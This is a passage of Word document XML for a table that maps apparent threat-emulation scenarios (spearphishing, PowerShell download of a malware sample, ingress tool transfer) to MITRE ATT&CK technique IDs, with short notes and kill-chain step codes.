          <w:p w14:paraId="0AD1BE49" w14:textId="453EB2AA" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="587744F5" w14:textId="1BB4E1EE" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71462095" w14:textId="00124896" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A5CD58A" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E7137" w:rsidRPr="00646EAA" w14:paraId="363FA448" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EB5C6A8" w14:textId="259C2740" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E930C3F" w14:textId="3F18FD3C" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Initial Access </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A49B855" w14:textId="4D526166" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1566.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29318101" w14:textId="0400A9BB" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B2EBAF5" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AC740A9" w14:textId="287C3018" w:rsidR="007E7137" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="490896BE" w14:textId="02D49814" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="698BE0E5" w14:textId="21F24C68" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] Scenario 1 - </w:t>
            </w:r>
            <w:r w:rsidRPr="007E7137">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">This scenario attempts to download the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E7137">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AlticGO</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E7137">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> sample from an external HTTP server and is attempted to be written to disk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E7137" w:rsidRPr="00646EAA" w14:paraId="216223CC" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="428E37FF" w14:textId="08D47F1E" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="007E7137">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6507034E" w14:textId="5B1D60C3" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="007E7137">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5916C716" w14:textId="4278057B" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="007E7137">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1204.00</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0018768B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">User Execution : </w:t>
            </w:r>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">Malicious </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59E08B94" w14:textId="145354A2" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="007E7137">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16579EE2" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="007E7137">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A771014" w14:textId="5BE2854B" w:rsidR="007E7137" w:rsidRDefault="007E7137" w:rsidP="007E7137">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04B0B027" w14:textId="72661C6B" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="007E7137">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09627654" w14:textId="11218CCC" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="007E7137">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] Scenario 1a - </w:t>
            </w:r>
            <w:r w:rsidRPr="007E7137">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Although there are various ways to download files remotely from a device, the most common is using PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E7137" w:rsidRPr="00646EAA" w14:paraId="2F1FF114" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D041430" w14:textId="5F8F688E" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">3 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30874F6D" w14:textId="1E209941" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">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2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51FEE835" w14:textId="09E9711F" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E7137">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E7137">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B1F0A67" w14:textId="5BA55939" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30DEE065" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71534766" w14:textId="715CCAED" w:rsidR="007E7137" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22E7038D" w14:textId="439A26FB" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="137FF67E" w14:textId="6E304EB3" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2] See above</w:t>
            </w:r>
            <w:r w:rsidR="006B0062">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B0062" w:rsidRPr="00646EAA" w14:paraId="3CFFF14A" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="777053AB" w14:textId="0500365C" w:rsidR="006B0062" w:rsidRPr="00646EAA" w:rsidRDefault="006B0062" w:rsidP="006B0062">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B46CB4C" w14:textId="3D85B5B7" w:rsidR="006B0062" w:rsidRPr="00646EAA" w:rsidRDefault="006B0062" w:rsidP="006B0062">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55F1E5F8" w14:textId="016D3578" w:rsidR="006B0062" w:rsidRPr="00646EAA" w:rsidRDefault="006B0062" w:rsidP="006B0062">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E9532A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C10403F" w14:textId="407B4405" w:rsidR="006B0062" w:rsidRPr="00646EAA" w:rsidRDefault="006B0062" w:rsidP="006B0062">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="567D92F8" w14:textId="77777777" w:rsidR="006B0062" w:rsidRPr="00646EAA" w:rsidRDefault="006B0062" w:rsidP="006B0062">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A7C0505" w14:textId="537DE40B" w:rsidR="006B0062" w:rsidRDefault="006B0062" w:rsidP="006B0062">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72D94AE2" w14:textId="58D46723" w:rsidR="006B0062" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="006B0062">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="151AB78A" w14:textId="79B23520" w:rsidR="006B0062" w:rsidRPr="00646EAA" w:rsidRDefault="006B0062" w:rsidP="006B0062">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] Scenario 1a - </w:t>
            </w:r>
            <w:r w:rsidRPr="006B0062">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">This spear phishing link will download </w:t>
            </w:r>
            <w:r w:rsidRPr="006B0062">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>“</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006B0062">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TraderTraitor</w:t>
            </w:r>
